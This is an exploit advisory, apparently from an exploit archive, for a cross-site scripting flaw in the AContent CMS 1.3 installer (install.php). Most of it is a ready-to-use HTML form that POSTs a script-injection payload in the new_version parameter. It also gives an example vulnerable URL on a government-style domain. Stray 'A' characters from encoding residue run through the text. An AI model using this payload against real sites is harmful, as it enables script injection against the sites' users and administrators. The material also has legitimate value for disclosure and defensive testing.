AContent CMS version 1.3 suffers from a cross site scripting vulnerability.
8fd4012ef73824f6b27dd49f03c21c000e83eca919e32dc0da30862ce508c844
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|=============================================================|
|[+] Exploit Title:A Cross Site Scripting in AContent Content Management System
|[+]
|[+] Exploit Author: Ashiyane Digital Security Team
|[+]
|[+] Download Link : https://sourceforge.net/projects/acontent/files/AContent-1.3.tar.gz/download
|[+]
|[+] Version : 1.3|[+]
|[+] Vendor : http://www.atutor.ca/acontent/
|[+]
|[+] Tested on:A Kali Linux
|[+]
|[+] Date: 12 /29 / 2016
|=============================================================|
|[+] Vuln Path : http://www.site.go.th/AContent/install/install.php
|[+] Method : POST
|=============================================================|
|[+] Exploit Code:
A
<form action="127.0.0.1/5/AContent/install/install.php" method="post" name="form">
A A A <input type="hidden" name="action" value="process" />
A A A <input type="hidden" name="step" value="1" />
A A A <input type="hidden" name="new_version" value="1.3'"/><ScRiPt >alert(123)</ScRiPt>" />
A A A
A A A <input type="submit" name="submit" class="button" value="I Agree" />
A A A A A A A <input type="submit" name="submit" class="button" value="I Disagree" /><br />
A A A
</form>
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|[+] Discovered By : M.R.S.L.Y
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|